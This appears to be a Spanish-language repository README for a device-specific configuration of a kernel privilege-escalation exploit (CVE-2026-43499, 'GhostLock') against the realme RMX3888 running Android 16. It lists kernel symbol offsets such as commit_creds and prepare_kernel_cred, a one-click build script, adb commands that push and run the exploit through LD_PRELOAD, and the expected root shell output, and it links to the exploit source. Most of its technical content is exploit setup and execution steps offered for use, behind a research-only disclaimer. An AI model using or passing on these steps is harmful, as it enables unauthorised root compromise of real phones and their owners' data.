
rmx3888-cve-2026-43499-config v0.2.0
Configuración del exploit CVE-2026-43499 para realme RMX3888 (Android 16) - 20 offsets de kernel verificados
Configuración del exploit CVE-2026-43499 para realme RMX3888
Información del dispositivo
- Marca/Modelo: realme RMX3888
- Versión de Android: 16 (SDK 36)
- ID de compilación: BP2A.250605.015
- Kernel: Linux 6.1.141-android14-11-o-gffc54a6d2287
- SoC: Qualcomm SM8650 (Snapdragon 8 Gen 3)
- Arquitectura: ARM64 (aarch64)
Descripción general
Este repositorio contiene los archivos de configuración completos para el exploit CVE-2026-43499 (GhostLock) dirigido al dispositivo realme RMX3888. Todos los offsets del kernel se han extraído y verificado desde el boot.img del dispositivo.
Características
✓ 20 offsets de kernel verificados extraídos de vmlinux
✓ Registro en tiempo real con O_SYNC + fsync para seguridad ante pánico del kernel
✓ Configuración específica del dispositivo para RMX3888
✓ Script de compilación con un clic con detección automática de NDK
✓ Documentación completa con guías de compilación
Archivos incluidos
Archivos de configuración
- target.h - Offsets de kernel específicos del dispositivo (20 offsets verificados)
- common.h - Configuración de compilación con integración de registro
- realtime_log.h - Implementación de registro en tiempo real
Documentación
- BUILD_GUIDE.md - Guía de compilación completa
- report.md - Informe de análisis detallado (Ronda 1)
- round2_report.md - Informe de configuración (Ronda 2)
- ROUND2_STATUS.md - Resumen del estado de ejecución
- compile_status.json - Estado de compilación legible por máquina
Scripts
- compile_rmx3888.sh - Script de compilación con un clic
Inicio rápido
Requisitos previos
- Android NDK r26d o posterior
- Entorno Git Bash, Linux/WSL o Termux
Compilación
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh
En Git Bash para Windows, el script detecta automáticamente la ruta SDK predeterminada utilizada por Android Studio y las herramientas de línea de comandos: /c/Android/Sdk/ndk/*.
Nota: ASHMEM_MISC_FOPS, ASHMEM_COMPAT_IOCTL y COPY_SPLICE_READ utilizan actualmente respaldos compatibles con la compilación en la cabecera de destino RMX3888. Reemplázalos con offsets verificados de vmlinux de RMX3888 antes de depender del comportamiento en tiempo de ejecución.
Uso
# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/
# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so
# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id
# Check logs
adb shell cat /sdcard/Download/log_*.txt
Offsets clave
Los offsets principales que aparecen a continuación se extrajeron del kernel 6.1.141. Consulta la nota anterior para conocer las entradas de respaldo compatibles con la compilación que aún requieren verificación específica para RMX3888.
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define INIT_TASK_OFF 0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF 0x0126bbe0ULL
#define COMMIT_CREDS 0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED 0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets
Características del registro
El módulo de registro en tiempo real integrado proporciona:
- Ruta de registro principal: /sdcard/Download/log_.txt
- Ruta de respaldo: /data/local/tmp/log_.txt
- A prueba de pánico del kernel: utiliza O_SYNC + fsync() para escritura inmediata en disco
- Entradas con marca de tiempo: todas las entradas de registro incluyen marcas de tiempo precisas
- Espejo de stderr: los registros también se envían a stderr para adb logcat
Resultados esperados
Explotación exitosa
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...
Salida del archivo de registro
` === CVE-2026-43499 Exploit Log Started === Time: 2026-07-23 18:00:00 PID: 12345 UID: 2000 Log Path: /sdcard/Download/log_20260723_180000.txt
[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `
Solución de problemas
Consulta BUILD_GUIDE.md para obtener instrucciones detalladas de solución de problemas, incluidos:
- Errores de compilación
- Fallos en tiempo de ejecución
- Problemas de omisión de KASLR
- Bloqueos de políticas de SELinux
Aviso de seguridad
⚠️ ADVERTENCIA: Esta configuración es solo para investigación de seguridad autorizada.
- Úsala solo en dispositivos de tu propiedad
- No distribuyas binarios compilados sin autorización
- Respeta las prácticas de divulgación responsable
- Los archivos de registro pueden contener información sensible del sistema
Detalles técnicos
Proceso de extracción
- Boot.img desempaquetado con el analizador de Android Boot Image v4
- vmlinux extraído con vmlinux-to-elf (102 871 símbolos)
- 99 580 símbolos válidos analizados
- 20 offsets críticos validados de forma cruzada
- Verificación de offsets mediante comprobaciones de consistencia de direcciones de símbolos
Verificación de offsets
- Dirección base del kernel confirmada: 0xffffffc008000000
- Todas las direcciones de símbolos validadas contra el diseño de memoria
- Referenciadas de forma cruzada con el dispositivo de referencia (Google Pixel tokay)
- 100 % de tasa de extracción exitosa (20/20 offsets)
Referencias
- CVE-2026-43499: GhostLock - vulnerabilidad de use-after-free (UAF) en el asignador Ion
- Fuente del exploit: https://github.com/NebuSec/CyberMeowfia
- Dispositivo objetivo: realme RMX3888 (Snapdragon 8 Gen 3)
Licencia
Esta configuración se proporciona únicamente con fines educativos y de investigación de seguridad.
Descargo de responsabilidad
Este repositorio contiene materiales de investigación de seguridad. Los autores y colaboradores no son responsables de ningún uso indebido ni de los daños causados por este código. Úsalo bajo tu propio riesgo y solo en dispositivos de tu propiedad o para los que tengas autorización explícita de prueba.
Generado: 2026-07-23
Versión del kernel: 6.1.141-android14-11-o-gffc54a6d2287
Verificación de offsets: 100 % (20/20)
Estado: Listo para compilación